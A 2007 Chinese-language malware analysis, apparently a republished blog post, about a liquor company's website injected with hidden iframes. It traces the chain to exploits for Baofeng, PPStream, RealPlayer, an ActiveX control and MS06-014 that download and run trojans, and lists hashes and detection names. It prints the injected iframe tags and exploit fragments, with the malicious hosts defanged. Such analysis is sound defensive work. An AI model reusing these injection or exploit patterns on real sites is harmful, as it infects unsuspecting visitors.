巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless

来源：互联网发布：淘宝网司法公开拍卖编辑：程序博客网时间：2024/04/28 07:24

endurer 原创
2007-12-13 第1版

检查首页代码，发现被多次加入代码：
/---
<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?075 widTh=1 naMe='6005' height=1＞＜/iframe＞

<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?013 width=1 height=1＞＜/iframe＞
<ifame src=hxxp://www.f**Oafa**u.infO/ms30.htm?823 width=1 Name='6016' height=1＞＜/ifraMe＞<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.hTm?075 wIdth=1 name='6016' height=1＞＜/iframe＞
---/

hxxp://A**A.ll*sging**.com/ww/new05.htm?075 包含代码：
/---
<ifame src=hxxp://A**A.ll*sging**.com/aa/haha.htm width=5 height=5＞＜/iframe＞
<ifame src=hxxp://A**A.ll*sging**.com/aa/gege.htm width=5 height=5＞＜/iframe＞
---/

hxxp://A**A.ll*sging**.com/ww/new05.htm?013 与 hxxp://A**A.ll*sging**.com/ww/new05.htm?075 相同。

hxxp://A**A.ll*sging**.com/aa/haha.htm　经2次解密得到原代码，功能是检查cookie变量OK，输出代码：
/---
＜script src=hxxp://aa.ll*sging**.com/aa/11.js＞＜/script＞
＜script src=hxxp://aa.ll*sging**.com/aa/bb.js＞＜/script＞
<ifame width='10' height='10' src='hxxp://A**A.ll*sging**.com/aa/bf.html'＞＜/iframe＞
---/
利用暴风影音漏洞，及BaiduBar.Tool下载hxxp://down.ll*sging**.com/bb/bd.cab

文件说明符 : D:/test/bd.cab
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:45:22
修改时间 : 2007-12-10 23:45:30
访问时间 : 2007-12-10 0:0:0
大小 : 34045 字节 33.253 KB
MD5 : 67e8a38e7570de02ec1e3b0fec7ac9d9
SHA1: 9EF39949C850CFE8C03F76FA0DFC7EC3BD286254
CRC32: 888380b0

文件说明符 : D:/test/bd.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-27 5:8:28
修改时间 : 2007-11-27 5:8:28
访问时间 : 2007-12-10 0:0:0
大小 : 34837 字节 34.21 KB
MD5 : 865188f4f8583f4c0728553b04375261
SHA1: BF3B97AE81F49CAF96268EF4CFF5B96C1818EB88
CRC32: deed8b5c

Kaspersky 报为 Worm.Win32.Downloader.bi
瑞星报为 Trojan.Win32.Mnless.znc》nspack

hxxp://A**A.ll*sging**.com/aa/11.js 经1次解密得到原代码，功能是下载hxxp://down.ll*sging**.com/bb/014.exe，保存为ntuser.com并运行。

文件说明符 : D:/test/014.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:42:45
修改时间 : 2007-12-10 23:42:46
访问时间 : 2007-12-10 0:0:0
大小 : 34854 字节 34.38 KB
MD5 : 19a5e9859be11640446fd3d7b6533d23
SHA1: 5B3A4028A4E85422ACAA3F7F974ECBB5D35E936B
CRC32: 57901cec
Kaspersky 报为 Worm.Win32.Downloader.bd
瑞星报为 Backdoor.Win32.Agent.yos》nspack

hxxp://A**A.ll*sging**.com/aa/bb.js 为暴风影音漏洞利用代码。

hxxp://A**A.ll*sging**.com/aa/ppp.js 为PPStream漏洞利用代码。

hxxp://A**A.ll*sging**.com/aa/bf.html 为
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞代码。

可参考：
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞
http://www.nsfocus.net/vulndb/11122

hxxp://A**A.ll*sging**.com/aa/gege.htm 经2次解密得到原代码，为RealPlayer 漏洞利用代码，其中末段代码挺有意思：
/---
ＰａｙＬｏａｄ＋＝"ＹｕａｎＧｅ";Ｒｅａｌ．Ｉｍｐｏｒｔ（"ｃ:＼＼ＰｒｏｇｒａｍＦｉｌｅｓ＼＼ＮｅｔＭｅｅｔｉｎｇ＼＼ＴｅｓｔＳｎｄ．ｗａｖ",ＰａｙＬｏａｄ,"",０,０）｝;ＲｅａｌＥｘｐｌｏｉｔ（）;）
---/

hxxp://www.f**Oafa**u.infO/ms30.htm?823 包含代码
/---
＜HTML＞
<ifame src="88/881.htm" width="20" height="0" frameborder="0"＞＜/iframe＞
<ifame src="88/883.htm" width="1" height="1" frameborder="0"＞＜/iframe＞
＜/HTML＞
---/

hxxp://www.f**Oafa**u.infO/88/881.htm 利用MS06-014: msadco.dll 漏洞下载hxxp://www.*6*8y**u*.cn/68down.exe，保存为C:/MicroSoft.pif，通过创建文件C:/MicroSoft.vbs来启动。代码中的一个变量名为：Qq784378237

文件说明符 : D:/test/68down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-10 23:44:5
修改时间 : 2007-12-10 23:44:6
访问时间 : 2007-12-10 0:0:0
大小 : 31876 字节 31.132 KB
MD5 : 7f29c1dbaae355933130030aed699672
SHA1: 1A5EDE06B6CCD19BB7FB9AF3E9B0456E847BFDD0
CRC32: 2738d5ad

Kaspersky 报为 Worm.Win32.Downloader.cg
瑞星报为 Trojan.Win32.Mnless.zyt

hxxp://www.f**Oafa**u.infO/88/883.htm 经2次解密得到原代码，同样为 RealPlayer 漏洞利用代码，其中末段代码与上面的不同：
/---
ＰａｙＬｏａｄ＋＝ "ＣｈｕｉＺｉ";
Ｒｅａｌ．Ｉｍｐｏｒｔ（"ｃ:＼＼ＰｒｏｇｒａｍＦｉｌｅｓ＼＼ＮｅｔＭｅｅｔｉｎｇ＼＼ＴｅｓｔＳｎｄ．ｗａｖ", ＰａｙＬｏａｄ,"", ０, ０）;
｝
ＲｅａｌＥｘｐｌｏｉｔ（）;）
---/